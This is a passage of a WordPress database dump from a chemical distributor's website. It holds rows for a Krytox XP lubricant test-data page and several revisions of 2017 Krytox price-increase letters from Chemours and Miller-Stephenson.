in 80 °C (176 °F) agitated hard water for five weeks with no rusting visible.</p>\n<p>Bearing corrosion prevention performance of grease with the soluble additive was tested against a PFPE grease with no additives and against a PFPE grease with standard anti-corrosion additives using the IP-220 (EMCOR) test method. This method uses a double row self-aligning bearing that is packed with grease. It is a dynamic test that runs partially submerged in water for 8 hr, sits for 16 hr, runs again for 8 hr, sits for 16 hr, runs again for 8 hr, and then allowed to sit for an additional 108 hr, which gives a test time of one week. At this time, the bearing is disassembled, and the outer race is examined for rusting. The outer race is rated from 0–5 on a standard rating scale, with 0 having no corrosion and 5 having more than 10% of the surface covered with corrosion. The water for the test is a modified hard water that contains salts and minerals to simulate water that normally would be found in industrial applications and similar in corrosion action to saltwater.</p>\n<p><img class="alignnone wp-image-3166" src="https://www.miller-stephenson.com/wp-content/uploads/2016/11/krytox-xp-final-corrosion-rating.jpg" alt="krytox-xp-final-corrosion-rating" width="414" height="141" /></p>\n<p>Corrosion prevention was also tested by <a href="https://www.astm.org/Standards/B117.htm">ASTM B117</a>, salt spray test. A polished steel test panel that was coated with a 4 mil coating of Krytox XP 2A5 grease and exposed to a 5% salt solution at 95 °C (203 °F) for 100 hr passed with no corrosion forming.</p>\n<p>Grease corrosion prevention was also tested by <a href="https://www.astm.org/Standards/D1743.htm">ASTM D1743</a>. This test uses greased tapered roller bearings that are rotated to spread the grease, and then are dipped in water and stored in a 100% relative humidity<br />\nenvironment for two days. The Krytox XP 2A5 grease passed with no rusting.</p>\n<p><img class="wp-image-3161 alignnone" src="https://www.miller-stephenson.com/wp-content/uploads/2016/11/krytox-xp-bearing-test-800x383.jpg" alt="krytox-xp-bearing-test" width="560" height="268" /></p>\n<p>The bearing race on the left clearly shows there is no corrosion when Krytox XP additive is present, the bearing in the center shows traces of rust with standard additives, and the bearing on the right shows heavy rusting with no additives.</p>\n<p><strong>Corrosion-Oxidation Stability Test</strong></p>\n<p>Krytox XP oils have been tested in the Corrosion-Oxidation Stability test as per Federal Test Method 791C, 5308.7. This method tests the ability of oils to resist oxidation and their tendency to corrode<br />\nvarious metals. Metal specimens are suspended in oil at elevated temperature, and air is blown through the mix. After completion, the oil is tested to determine the extent of degradation, and the metal coupons are examined for corrosion.</p>\n<p><strong>Results on Krytox XP 1A5 oil after 168 hr at 122 °C (250 °F)</strong><br />\nEvaporation loss 1.0%<br />\nIncrease in viscosity 1.7%</p>\n<p>&nbsp;</p>\n<p><strong>Change in weight of metals, mg/cm^2</strong></p>\n<table width="399">\n<tbody>\n<tr>\n<td width="219">Copper</td>\n<td width="180">-0.59</td>\n</tr>\n<tr>\n<td>Copper Alloy 932</td>\n<td>-0.22</td>\n</tr>\n<tr>\n<td>Cadmium</td>\n<td>-0.01</td>\n</tr>\n<tr>\n<td>Aluminum</td>\n<td>0</td>\n</tr>\n<tr>\n<td>Steel</td>\n<td>0</td>\n</tr>\n<tr>\n<td>Magnesium</td>\n<td>0.01</td>\n</tr>\n</tbody>\n</table>\n<p><strong>Elastomer Compatibility</strong><br />\nElastomer compatibility screening was conducted on Krytox XP products. Additional testing is being performed to fully characterize if materials are affected by additives in Krytox XP products. The table below lists the percentage of swelling after 168 or 672 hr of exposure.</p>\n<p>Mylar® polyester film and Teflon™ fluoropolymer have been tested with no damage, and additional elastomers are currently being tested for compatibility with the additives. Kalrez® perfluoroelastomer parts show the same swell that happens with pure Krytox at high temperatures. Caution should be used with unlisted materials until compatibility testing is completed.</p>\n<p><img class="alignnone wp-image-3167" src="https://www.miller-stephenson.com/wp-content/uploads/2016/11/krytox-xp-plastic.jpg" alt="krytox-xp-plastic" width="443" height="230" /></p>\n<p><strong>Storage and Shelf Life</strong><br />\nKrytox XP series lubricants can develop an odor and a slight amber/pinkish color over time. The Krytox XP series has a three-year shelf life and recommended maximum operating temperature of 182 °C (360 °F). Testing has shown that these products retain their anti-rust and anti-wear properties, and perform well past the end of the recommended three-year shelf life. Keep product sealed and store in a cool, dry place.</p>\n[share title="Social Share XP"]\n\n[ux_product_categories ids="170,169" number="10"]\n\n<p>&nbsp;</p>', 'Krytox XP - Bearing Grease & Oil with Soluble Additives', '', 'inherit', 'closed', 'closed', '', '3160-revision-v1', '', '', '2016-11-29 15:19:34', '2016-11-29 15:19:34', '', 3160, 'https://www.miller-stephenson.com/3160-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (3174, 203, '2016-11-29 17:14:36', '2016-11-29 17:14:36', '', '', '', 'publish', 'closed', 'closed', '', '3174', '', '', '2016-11-29 17:14:37', '2016-11-29 17:14:37', '', 0, 'https://www.miller-stephenson.com/nf_sub/3174/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3175, 0, '2016-11-29 19:36:56', '2016-11-29 19:36:56', '', '', '', 'publish', 'closed', 'closed', '', '3175', '', '', '2016-11-29 19:36:57', '2016-11-29 19:36:57', '', 0, 'https://www.miller-stephenson.com/nf_sub/3175/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3176, 204, '2016-11-29 20:30:59', '2016-11-29 20:30:59', '', '', '', 'publish', 'closed', 'closed', '', '3176', '', '', '2016-11-29 20:30:59', '2016-11-29 20:30:59', '', 0, 'https://www.miller-stephenson.com/nf_sub/3176/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3177, 203, '2016-11-29 20:36:54', '2016-11-29 20:36:54', '', '', '', 'publish', 'closed', 'closed', '', '3177', '', '', '2016-11-29 20:36:54', '2016-11-29 20:36:54', '', 0, 'https://www.miller-stephenson.com/nf_sub/3177/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3178, 205, '2016-11-30 12:55:10', '2016-11-30 12:55:10', '', '', '', 'publish', 'closed', 'closed', '', '3178', '', '', '2016-11-30 12:55:10', '2016-11-30 12:55:10', '', 0, 'https://www.miller-stephenson.com/nf_sub/3178/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3179, 207, '2016-11-30 16:17:15', '2016-11-30 16:17:15', '', '', '', 'publish', 'closed', 'closed', '', '3179', '', '', '2016-11-30 16:17:15', '2016-11-30 16:17:15', '', 0, 'https://www.miller-stephenson.com/nf_sub/3179/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3180, 0, '2016-11-30 19:35:49', '2016-11-30 19:35:49', '', '', '', 'publish', 'closed', 'closed', '', '3180', '', '', '2016-11-30 19:35:50', '2016-11-30 19:35:50', '', 0, 'https://www.miller-stephenson.com/nf_sub/3180/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3181, 67, '2016-11-30 22:37:20', '2016-11-30 22:37:20', '', '', '', 'publish', 'closed', 'closed', '', '3181', '', '', '2016-11-30 22:37:20', '2016-11-30 22:37:20', '', 0, 'https://www.miller-stephenson.com/nf_sub/3181/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3182, 211, '2016-11-30 23:56:39', '2016-11-30 23:56:39', '', '', '', 'publish', 'closed', 'closed', '', '3182', '', '', '2016-11-30 23:56:39', '2016-11-30 23:56:39', '', 0, 'https://www.miller-stephenson.com/nf_sub/3182/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3183, 212, '2016-12-01 13:01:54', '2016-12-01 13:01:54', '', '', '', 'publish', 'closed', 'closed', '', '3183', '', '', '2016-12-01 13:01:54', '2016-12-01 13:01:54', '', 0, 'https://www.miller-stephenson.com/nf_sub/3183/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3184, 0, '2016-12-01 14:23:16', '2016-12-01 14:23:16', '', '', '', 'publish', 'closed', 'closed', '', '3184', '', '', '2016-12-01 14:23:16', '2016-12-01 14:23:16', '', 0, 'https://www.miller-stephenson.com/nf_sub/3184/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3185, 214, '2016-12-01 15:52:10', '2016-12-01 15:52:10', '', '', '', 'publish', 'closed', 'closed', '', '3185', '', '', '2016-12-01 15:52:10', '2016-12-01 15:52:10', '', 0, 'https://www.miller-stephenson.com/nf_sub/3185/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3186, 0, '2016-12-01 18:09:58', '2016-12-01 18:09:58', '', '', '', 'publish', 'closed', 'closed', '', '3186', '', '', '2016-12-01 18:09:58', '2016-12-01 18:09:58', '', 0, 'https://www.miller-stephenson.com/nf_sub/3186/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3187, 2, '2016-12-01 19:04:52', '2016-12-01 19:04:52', '<img class="alignnone size-full wp-image-3188" src="https://www.miller-stephenson.com/wp-content/uploads/2016/12/chemours-logo.png" alt="chemours-logo" width="386" height="124" />\r\n\r\nNovember 16, 2016\r\n\r\nDear Valued Customer:\r\nRe: Krytox™ Lubricants and Fluoroguard™ Polymer Additives\r\nEffective with orders shipped starting January 1, 2017, Chemours will be implementing a price increase on Krytox™ lubricant and Fluoroguard™ polymer additive products.\r\n\r\nChemours will increase price by an average of 4% across its standard product line. The specialized product lines which include our customized and small lots production will increase up to 12%.\r\n\r\nWe regret that rising costs for raw materials and production necessitates this increase. Please be assured that Chemours continues to doing everything possible to hold down its costs to our loyal customers.\r\n\r\nWe are committed to providing you the best quality, service and value which will allow us to grow together. Krytox™ lubricants and Fluoroguard™ polymer additives offer a wide variety of products to reduce maintenance cost and provide a safe and efficient operating environment for your process.\r\n\r\nThe Krytox™ team is truly committed to providing exceptional service and support. If you have any future questions or concerns, please don’t hesitate to contact us. We thank you for your business and understanding.\r\n\r\nSincerely,\r\n\r\n<img class="alignnone size-full wp-image-3191" src="https://www.miller-stephenson.com/wp-content/uploads/2016/12/gullo-signature.jpg" alt="gullo-signature" width="212" height="79" />\r\nMark J Gullo\r\nNA Business and Market Manager\r\nKrytox™ Performance Lubricants\r\n(302) 773-1267\r\n\r\nKrytox™, Fluoroguard™ brands and Chemours Logo are trademarks of The Chemours Company FC, LLC.\r\n\r\nPlease click here for the complete <a href="https://www.miller-stephenson.com/krytox/">Krytox product line</a>.', '2017 Krytox™ Price Increase - Chemours News', '', 'publish', 'closed', 'closed', '', '2017-krytox-price-increase-chemours-news', '', '', '2016-12-01 20:23:31', '2016-12-01 20:23:31', '', 0, 'https://www.miller-stephenson.com/?p=3187', 0, 'post', '', 0); 
INSERT INTO `wp_posts` VALUES (3188, 2, '2016-12-01 19:01:56', '2016-12-01 19:01:56', '', 'chemours-logo', '', 'inherit', 'closed', 'closed', '', 'chemours-logo', '', '', '2016-12-01 19:01:56', '2016-12-01 19:01:56', '', 3187, 'https://www.miller-stephenson.com/wp-content/uploads/2016/12/chemours-logo.png', 0, 'attachment', 'image/png', 0); 
INSERT INTO `wp_posts` VALUES (3189, 2, '2016-12-01 19:04:52', '2016-12-01 19:04:52', '<img class="alignnone size-full wp-image-3188" src="https://www.miller-stephenson.com/wp-content/uploads/2016/12/chemours-logo.png" alt="chemours-logo" width="386" height="124" />\r\n\r\nNovember 16, 2016\r\n\r\nDear Valued Customer:\r\nRe: Krytox™ Lubricants and Fluoroguard™ Polymer Additives\r\nEffective with orders shipped starting January 1, 2017, Chemours will be implementing a price increase on Krytox™ lubricant and Fluoroguard™ polymer additive products.\r\n\r\nChemours will increase price by an average of 4% across its standard product line. The specialized product lines which include our customized and small lots production will increase up to 12%.\r\n\r\nWe regret that rising costs for raw materials and production necessitates this increase. Please be assured that Chemours continues to doing everything possible to hold down its costs to our loyal customers.\r\n\r\nWe are committed to providing you the best quality, service and value which will allow us to grow together. Krytox™ lubricants and Fluoroguard™ polymer additives offer a wide variety of products to reduce maintenance cost and provide a safe and efficient operating environment for your process.\r\n\r\nThe Krytox™ team is truly committed to providing exceptional service and support. If you have any future questions or concerns, please don’t hesitate to contact us. We thank you for your business and understanding.\r\n\r\nSincerely,\r\nMark J Gullo\r\nNA Business and Market Manager\r\nKrytox™ Performance Lubricants\r\n(302) 773-1267\r\n\r\nKrytox™, Fluoroguard™ brands and Chemours Logo are trademarks of The Chemours Company FC, LLC.', '2017 Krytox™ Price Increase - Chemours News', '', 'inherit', 'closed', 'closed', '', '3187-revision-v1', '', '', '2016-12-01 19:04:52', '2016-12-01 19:04:52', '', 3187, 'https://www.miller-stephenson.com/3187-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (3190, 2, '2016-12-01 19:12:25', '2016-12-01 19:12:25', '<img class="alignnone size-full wp-image-3204" src="https://www.miller-stephenson.com/wp-content/uploads/2016/12/ms-letterhead.jpg" alt="ms-letterhead" width="1012" height="292" />\r\n\r\nDecember 1, 2016\r\n\r\nSUBJECT: KRYTOX PRICE INCREASE NOTICE EFFECTIVE JANUARY 1, 2017\r\n\r\nChemours Inc, the manufacturer of Krytox™ Grease and Oils, has announced a price increase effective January 1, 2017 for all Krytox™ products. The increased percentage will be between 4-12% and will vary by product.\r\n\r\nAs you can see from the <span style="font-size: 105%;"><strong><a href="https://www.miller-stephenson.com/2017-krytox-price-increase-chemours-news/">letter here</a></strong></span> we received from Chemours, the new price schedule is a result of rising costs for raw materials and production.\r\n\r\nMiller-Stephenson Chemical has been authorized distributor and channel partner for Krytox™ Greases and Oils for over 25 years. We pride ourselves on providing competitive pricing as well as a wide variety of stock at our multiple office locations. We thank you for your continued interest in Miller-Stephenson Chemical. Please contact our Customer Service Department or visit our website (www.miller-stephenson.com) for a price\r\nquotation.\r\n\r\nIf you have any questions or concerns, please let us know\r\n\r\nSincerely\r\nCustomer Service Department\r\nMiller-Stephenson Chemical\r\n\r\nPlease click here for the complete <a href="https://www.miller-stephenson.com/krytox/">Krytox product line</a>.', 'Miller-Stephenson 2017 Krytox™ Price Increase Press Release', '', 'publish', 'closed', 'closed', '', 'miller-stephenson-2017-krytox-price-increase-press-release', '', '', '2016-12-01 20:37:51', '2016-12-01 20:37:51', '', 0, 'https://www.miller-stephenson.com/?p=3190', 0, 'post', '', 0); 
INSERT INTO `wp_posts` VALUES (3191, 2, '2016-12-01 19:10:49', '2016-12-01 19:10:49', '', 'gullo-signature', '', 'inherit', 'closed', 'closed', '', 'gullo-signature', '', '', '2016-12-01 19:10:49', '2016-12-01 19:10:49', '', 3187, 'https://www.miller-stephenson.com/wp-content/uploads/2016/12/gullo-signature.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (3192, 2, '2016-12-01 19:11:01', '2016-12-01 19:11:01', '<img class="alignnone size-full wp-image-3188" src="https://www.miller-stephenson.com/wp-content/uploads/2016/12/chemours-logo.png" alt="chemours-logo" width="386" height="124" />\r\n\r\nNovember 16, 2016\r\n\r\nDear Valued Customer:\r\nRe: Krytox™ Lubricants and Fluoroguard™ Polymer Additives\r\nEffective with orders shipped starting January 1, 2017, Chemours will be implementing a price increase on Krytox™ lubricant and Fluoroguard™ polymer additive products.\r\n\r\nChemours will increase price by an average of 4% across its standard product line. The specialized product lines which include our customized and small lots production will increase up to 12%.\r\n\r\nWe regret that rising costs for raw materials and production necessitates this increase. Please be assured that Chemours continues to doing everything possible to hold down its costs to our loyal customers.\r\n\r\nWe are committed to providing you the best quality, service and value which will allow us to grow together. Krytox™ lubricants and Fluoroguard™ polymer additives offer a wide variety of products to reduce maintenance cost and provide a safe and efficient operating environment for your process.\r\n\r\nThe Krytox™ team is truly committed to providing exceptional service and support. If you have any future questions or concerns, please don’t hesitate to contact us. We thank you for your business and understanding.\r\n\r\nSincerely,\r\n\r\n<img class="alignnone size-full wp-image-3191" src="https://www.miller-stephenson.com/wp-content/uploads/2016/12/gullo-signature.jpg" alt="gullo-signature" width="212" height="79" />\r\nMark J Gullo\r\nNA Business and Market Manager\r\nKrytox™ Performance Lubricants\r\n(302) 773-1267\r\n\r\nKrytox™, Fluoroguard™ brands and Chemours Logo are trademarks of The Chemours Company FC, LLC.', '2017 Krytox™ Price Increase - Chemours News', '', 'inherit', 'closed', 'closed', '', '3187-revision-v1', '', '', '2016-12-01 19:11:01', '2016-12-01 19:11:01', '', 3187, 'https://www.miller-stephenson.com/3187-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (3193, 2, '2016-12-01 19:12:25', '2016-12-01 19:12:25', 'December 1, 2016\r\n\r\nSUBJECT: KRYTOX PRICE INCREASE NOTICE EFFECTIVE JANUARY 1, 2017\r\n\r\nChemours Inc, the manufacturer of Krytox™ Grease and Oils, has announced a price increase effective January 1, 2017 for all Krytox™ products. The increased percentage will be between 4-12% and will vary by product.\r\n\r\nAs you can see from the <a href="https://www.miller-stephenson.com/2017-krytox-price-increase-chemours-news/">letter here</a> we received from Chemours, the new price schedule is a result of rising costs for raw materials and production.\r\n\r\nMiller-Stephenson Chemical has been authorized distributor and channel partner for Krytox™ Greases and Oils for over 25 years. We pride ourselves on providing competitive pricing as well as a wide variety of stock at our multiple office locations. We thank you for your continued interest in Miller-Stephenson Chemical. Please contact our Customer Service Department or visit our website (www.miller-stephenson.com) for a price\r\nquotation.\r\n\r\nIf you have any questions or concerns, please let us know\r\n\r\nSincerely\r\nCustomer Service Department\r\nMiller-Stephenson Chemical', 'Miller-Stephenson 2017 Krytox™ Price Increase Press Release', '', 'inherit', 'closed', 'closed', '', '3190-revision-v1', '', '', '2016-12-01 19:12:25', '2016-12-01 19:12:25', '', 3190, 'https://www.miller-stephenson.com/3190-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (3194, 2, '2016-12-01 19:17:28', '2016-12-01 19:17:28', 'December 1, 2016\r\n\r\nSUBJECT: KRYTOX PRICE INCREASE NOTICE EFFECTIVE JANUARY 1, 2017\r\n\r\nChemours Inc, the manufacturer of Krytox™ Grease and Oils, has announced a price increase effective January 1, 2017 for all Krytox™ products. The increased percentage will be between 4-12% and will vary by product.\r\n\r\nAs you can see from the <span style="font-size: 105%;"><strong><a href="https://www.miller-stephenson.com/2017-krytox-price-increase-chemours-news/">letter here</a></strong></span> we received from Chemours, the new price schedule is a result of rising costs for raw materials and production.\r\n\r\nMiller-Stephenson Chemical has been authorized distributor and channel partner for Krytox™ Greases and Oils for over 25 years. We pride ourselves on providing competitive pricing as well as a wide variety of stock at our multiple office locations. We thank you for your continued interest in Miller-Stephenson Chemical. Please contact our Customer Service Department or visit our website (www.miller-stephenson.com) for a price\r\nquotation.\r\n\r\nIf you have any questions or concerns, please let us know\r\n\r\nSincerely\r\nCustomer Service Department\r\nMiller-Stephenson Chemical', 'Miller-Stephenson 2017 Krytox™ Price Increase Press Release', '', 'inherit', 'closed', 'closed', '', '3190-revision-v1', '', '', '2016-12-01 19:17:28', '2016-12-01 19:17:28', '', 3190, 'https://www.miller-stephenson.com/3190-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (3195, 2, '2016-12-01 19:19:09', '2016-12-01 19:19:09', 'December 1, 2016\r\n\r\nSUBJECT: KRYTOX PRICE INCREASE NOTICE EFFECTIVE JANUARY 1, 2017\r\n\r\nChemours Inc, the manufacturer of Krytox™ Grease and Oils, has announced a price increase effective January 1, 2017 for all Krytox™ products. The increased percentage will be between 4-12% and will vary by product.\r\n\r\nAs you can see from the <span style="font-size: 105%;"><strong><a href="https://www.miller-stephenson.com/2017-krytox-price-increase-chemours-news/">letter here</a></strong></span> we received from Chemours, the new price schedule is a result of rising costs for raw materials and production.\r\n\r\nMiller-Stephenson Chemical has been authorized distributor and channel partner for Krytox™ Greases and Oils for over 25 years. We pride ourselves on providing competitive pricing as well as a wide variety of stock at our multiple office locations. We thank you for your continued interest in Miller-Stephenson Chemical. Please contact our Customer Service Department or visit our website (www.miller-stephenson.com) for a price\r\nquotation.\r\n\r\nIf you have any questions or concerns, please let us know\r\n\r\nSincerely\r\nCustomer Service Department\r\nMiller-Stephenson Chemical\r\n\r\n<strong>TO BROWSE OUR KRYTOX CATALOG, SELECT A CATEGORY BELOW:</strong>\r\n[product_categories number="12" ids="34,35,156,40,37,38,36,165,39,168,160,143" columns="4" title="Lubricants, Greases and Oils"]', 'Miller-Stephenson 2017 Krytox™ Price Increase Press Release', '', 'inherit', 'closed', 'closed', '', '3190-revision-v1', '', '', '2016-12-01 19:19:09', '2016-12-01 19:19:09', '', 3190, 'https://www.miller-stephenson.com/3190-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (3196, 2, '2016-12-01 19:19:24', '2016-12-01 19:19:24', '<img class="alignnone size-full wp-image-3188" src="https://www.miller-stephenson.com/wp-content/uploads/2016/12/chemours-logo.png" alt="chemours-logo" width="386" height="124" />\r\n\r\nNovember 16, 2016\r\n\r\nDear Valued Customer:\r\nRe: Krytox™ Lubricants and Fluoroguard™ Polymer Additives\r\nEffective with orders shipped starting January 1, 2017, Chemours will be implementing a price increase on Krytox™ lubricant and Fluoroguard™ polymer additive products.\r\n\r\nChemours will increase price by an average of 4% across its standard product line. The specialized product lines which include our customized and small lots production will increase up to 12%.\r\n\r\nWe regret that rising costs for raw materials and production necessitates this increase. Please be assured that Chemours continues to doing everything possible to hold down its costs to our loyal customers.\r\n\r\nWe are committed to providing you the best quality, service and value which will allow us to grow together. Krytox™ lubricants and Fluoroguard™ polymer additives offer a wide variety of products to reduce maintenance cost and provide a safe and efficient operating environment for your process.\r\n\r\nThe Krytox™ team is truly committed to providing exceptional service and support. If you have any future questions or concerns, please don’t hesitate to contact us. We thank you for your business and understanding.\r\n\r\nSincerely,\r\n\r\n<img class="alignnone size-full wp-image-3191" src="https://www.miller-stephenson.com/wp-content/uploads/2016/12/gullo-signature.jpg" alt="gullo-signature" width="212" height="79" />\r\nMark J Gullo\r\nNA Business and Market Manager\r\nKrytox™ Performance Lubricants\r\n(302) 773-1267\r\n\r\nKrytox™, Fluoroguard™ brands and Chemours Logo are trademarks of The Chemours Company FC, LLC.\r\n\r\n<strong>\r\nTO BROWSE OUR KRYTOX CATALOG, SELECT A CATEGORY BELOW:</strong>\r\n[product_categories number="12" ids="34,35,156,40,37,38,36,165,39,168,160,143" columns="4" title="Lubricants, Greases and Oils"]', '2017 Krytox™ Price Increase - Chemours News', '', 'inherit', 'closed', 'closed', '', '3187-revision-v1', '', '', '2016-12-01 19:19:24', '2016-12-01 19:19:24', '', 3187, 'https://www.miller-stephenson.com/3187-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (3197, 0, '2016-12-01 20:15:08', '2016-12-01 20:15:08', '', '', '', 'publish', 'closed', 'closed', '', '3197', '', '', '2016-12-01 20:15:08', '2016-12-01 20:15:08', '', 0, 'https://www.miller-stephenson.com/nf_sub/3197/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3198, 2, '2016-12-01 20:37:42', '2016-12-01 20:37:42', '&nbsp;\n\nDecember 1, 2016\n\nSUBJECT: KRYTOX PRICE INCREASE NOTICE EFFECTIVE JANUARY 1, 2017\n\nChemours Inc, the manufacturer of Krytox™ Grease and Oils, has announced a price increase effective January 1, 2017 for all Krytox™ products. The increased percentage will be between 4-12% and will vary by product.\n\nAs you can see from the <span style="font-size: 105%;"><strong><a href="https://www.miller-stephenson.com/2017-krytox-price-increase-chemours-news/">letter here</a></strong></span> we received from Chemours, the new price schedule is a result of rising costs for raw materials and production.\n\nMiller-Stephenson Chemical has been authorized distributor and channel partner for Krytox™ Greases and Oils for over 25 years. We pride ourselves on providing competitive pricing as well as a wide variety of stock at our multiple office locations. We thank you for your continued interest in Miller-Stephenson Chemical. Please contact our Customer Service Department or visit our website (www.miller-stephenson.com) for a price\nquotation.\n\nIf you have any questions or concerns, please let us know\n\nSincerely\nCustomer Service Department\nMiller-Stephenson Chemical\n\nPlease click here for the complete <a href="https://www.miller-stephenson.com/krytox/">Krytox product line</a>.', 'Miller-Stephenson 2017 Krytox™ Price Increase Press Release', '', 'inherit', 'closed', 'closed', '', '3190-autosave-v1', '', '', '2016-12-01 20:37:42', '2016-12-01 20:37:42', '', 3190, 'https://www.miller-stephenson.com/3190-autosave-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (3199, 2, '2016-12-01 20:22:28', '2016-12-01 20:22:28', 'December 1, 2016\r\n\r\nSUBJECT: KRYTOX PRICE INCREASE NOTICE EFFECTIVE JANUARY 1, 2017\r\n\r\nChemours Inc, the manufacturer of Krytox™ Grease and Oils, has announced a price increase effective January 1, 2017 for all Krytox™ products. The increased percentage will be between 4-12% and will vary by product.\r\n\r\nAs you can see from the <span style="font-size: 105%;"><strong><a href="https://www.miller-stephenson.com/2017-krytox-price-increase-chemours-news/">letter here</a></strong></span> we received from Chemours, the new price schedule is a result of rising costs for raw materials and production.\r\n\r\nMiller-Stephenson Chemical has been authorized distributor and channel partner for Krytox™ Greases and Oils for over 25 years. We pride ourselves on providing competitive pricing as well as a wide variety of stock at our multiple office locations. We thank you for your continued interest in Miller-Stephenson Chemical. Please contact our Customer Service Department or visit our website (www.miller-stephenson.com) for a price\r\nquotation.\r\n\r\nIf you have any questions or concerns, please let us know\r\n\r\nSincerely\r\nCustomer Service Department\r\nMiller-Stephenson Chemical\r\n\r\nPlease click here for the complete <a href="https://www.miller-stephenson.com/krytox/">Krytox product line</a>.', 'Miller-Stephenson 2017 Krytox™ Price Increase Press Release', '', 'inherit', 'closed', 'closed', '', '3190-revision-v1', '', '', '2016-12-01 20:22:28', '2016-12-01 20:22:28', '', 3190, 'https://www.miller-stephenson.com/3190-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (3200, 2, '2016-12-01 20:23:08', '2016-12-01 20:23:08', 'https://www.miller-stephenson.com/krytox/\r\n\r\n<img class="alignnone size-full wp-image-3188" src="https://www.miller-stephenson.com/wp-content/uploads/2016/12/chemours-logo.png" alt="chemours-logo" width="386" height="124" />\r\n\r\nNovember 16, 2016\r\n\r\nDear Valued Customer:\r\nRe: Krytox™ Lubricants and Fluoroguard™ Polymer Additives\r\nEffective with orders shipped starting January 1, 2017, Chemours will be implementing a price increase on Krytox™ lubricant and Fluoroguard™ polymer additive products.\r\n\r\nChemours will increase price by an average of 4% across its standard product line. The specialized product lines which include our customized and small lots production will increase up to 12%.\r\n\r\nWe regret that rising costs for raw materials and production necessitates this increase. Please be assured that Chemours continues to doing everything possible to hold down its costs to our loyal customers.\r\n\r\nWe are committed to providing you the best quality, service and value which will allow us to grow together. Krytox™ lubricants and Fluoroguard™ polymer additives offer a wide variety of products to reduce maintenance cost and provide a safe and efficient operating environment for your process.\r\n\r\nThe Krytox™ team is truly committed to providing exceptional service and support. If you have any future questions or concerns, please don’t hesitate to contact us. We thank you for your business and understanding.\r\n\r\nSincerely,\r\n\r\n<img class="alignnone size-full wp-image-3191" src="https://www.miller-stephenson.com/wp-content/uploads/2016/12/gullo-signature.jpg" alt="gullo-signature" width="212" height="79" />\r\nMark J Gullo\r\nNA Business and Market Manager\r\nKrytox™ Performance Lubricants\r\n(302) 773-1267\r\n\r\nKrytox™, Fluoroguard™ brands and Chemours Logo are trademarks of The Chemours Company FC, LLC.\r\n\r\nPlease click here for the complete <a href="https://www.miller-stephenson.com/krytox/">Krytox product line</a>.', '2017 Krytox™ Price Increase - Chemours News', '', 'inherit', 'closed', 'closed', '', '3187-revision-v1', '', '', '2016-12-01 20:23:08', '2016-12-01 20:23:08', '', 3187, 'https://www.miller-stephenson.com/3187-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (3201, 2, '2016-12-01 20:23:31', '2016-12-01 20:23:31', '<img class="alignnone size-full wp-image-3188" src="https://www.miller-stephenson.com/wp-content/uploads/2016/12/chemours-logo.png" alt="chemours-logo" width="386" height="124" />\r\n\r\nNovember 16, 2016\r\n\r\nDear Valued Customer:\r\nRe: Krytox™ Lubricants and Fluoroguard™ Polymer Additives\r\nEffective with orders shipped starting January 1, 2017, Chemours will be implementing a price increase on Krytox™ lubricant and Fluoroguard™ polymer additive products.\r\n\r\nChemours will increase price by an average of 4% across its standard product line. The specialized product lines which include our customized and small lots production will increase up to 12%.\r\n\r\nWe regret that rising costs for raw materials and production necessitates this increase. Please be assured that Chemours continues to doing everything possible to hold down its costs to our loyal customers.\r\n\r\nWe are committed to providing you the best quality, service and value which will allow us to grow together. Krytox™ lubricants and Fluoroguard™ polymer additives offer a wide variety of products to reduce maintenance cost and provide a safe and efficient operating environment for your process.\r\n\r\nThe Krytox™ team is truly committed to providing exceptional service and support. If you have any future questions or concerns, please don’t hesitate to contact us. We thank you for your business and understanding.\r\n\r\nSincerely,\r\n\r\n<img class="alignnone size-full wp-image-3191" src="https://www.miller-stephenson.com/wp-content/uploads/2016/12/gullo-signature.jpg" alt="gullo-signature" width="212" height="79" />\r\nMark J Gullo\r\nNA Business and Market Manager\r\nKrytox™ Performance Lubricants\r\n(302) 773-1267\r\n\r\nKrytox™, Fluoroguard™ brands and Chemours Logo are trademarks of The Chemours Company FC, LLC.\r\n\r\nPlease click here for the complete <a href="https://www.miller-stephenson.com/krytox/">Krytox product line</a>.', '2017 Krytox™ Price Increase - Chemours News', '', 'inherit', 'closed', 'closed', '', '3187-revision-v1', '', '', '2016-12-01 20:23:31', '2016-12-01 20:23:31', '', 3187, 'https://www.miller-stephenson.com/3187-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (3202, 215, '2016-12-01 20:26:43', '2016-12-01 20:26:43', '', '', '', 'publish', 'closed', 'closed', '', '3202', '', '', '2016-12-01 20:26:44', '2016-12-01 20:26:44', '', 0, 'https://www.miller-stephenson.com/nf_sub/3202/', 0, 'nf_sub', '', 0); 
